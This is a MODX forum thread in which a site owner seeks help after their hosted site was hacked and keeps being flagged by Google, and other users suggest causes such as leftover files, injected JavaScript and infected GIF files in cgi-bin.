Hacked site - cleaned up installation, upgraded but still gets flagged by google

hi there,

one of my sites recently got hacked on Strato, several php files with similar contents e.g.

were placed in different asset folders. After cleaning up the installation and upgrading via the alternative method the site still gets flagged by google as "not safe". If I upgrade it again the site is good for ~1 day, then is flagged again, although I never encountered new .php files. Folders are 755 and files 644 and onbly the cache folder is on 0777 and only has the bare minimum of Snippets, Plugins & Moduls

any ideas what could be going on? anything to look after in logfiles? currently I'm totally baffled and not sure if google flags false positives or the webhost (Strato, not of any help either) has a security breach.

cheers & thanks, j

Read right through the following thread - you may not have removed all the offending files…

http://forums.modx.com/thread/?thread=93126&page=1

Maybe they have changed some code in MODX database tables too (i.e. snippet/plugin code of custom snippets - everything that is not updated with the install script).

But I have a strange smell of server issues in your case. On one customer site, the apache access log did not show any foreign request when the javascripts were modified on the installation, so the attack was not done through a MODX issue in that installation. Maybe the vhosts are not separated on that server and the files were modified by a script on another vhost or maybe there is some other server issue. Difficult to say if the provider is not cooperative - and the customers provider belongs to that type of providers. [ed. note: Jako last edited this post 9 years, 7 months ago.]

Hi Chris, Hi Jako,

thanks for replying

Jako, on a reverse IP check I did not find any other sites on that webspace.

Yes, Strato is a PITA, didn't respond to any of my emails and blocked the site probably because google flagged it, but weren't communicating at all about the issue. after several emails the unblocked it, but it's still flagged by google.

In the logfiles I saw several POSTs to files that were no longer there, but nothing else that was (in my noob eyes) suspicious).

cheers, j

oh, okay ...the JS files @_@

Quote from: sharkbait at Sep 29, 2014, 10:24 AM

Jako, on a reverse IP check I did not find any other sites on that webspace.

Different IPs could even point to the same server. But without knowing, how the files are changed (by a script on the same vhost, by a script on a different vhost, by something else …), this is academic …

Quote from: sharkbait at Sep 29, 2014, 10:24 AM

after several emails the unblocked it, but it's still flagged by google.

Have you told google that it is cleaned in google webmaster tools?

thanks,

yes, about to request another site check after removing the injected JS code

The crux of it from what I saw, was infected .gif files in cgi-bin. This seemed to be where it all started.

The crux of it from what I saw, was infected .gif files in cgi-bin. This seemed to be where it all started.

in your server root? assuming that means the server was vulnerable, right?

how can I check if a GIF file is infected?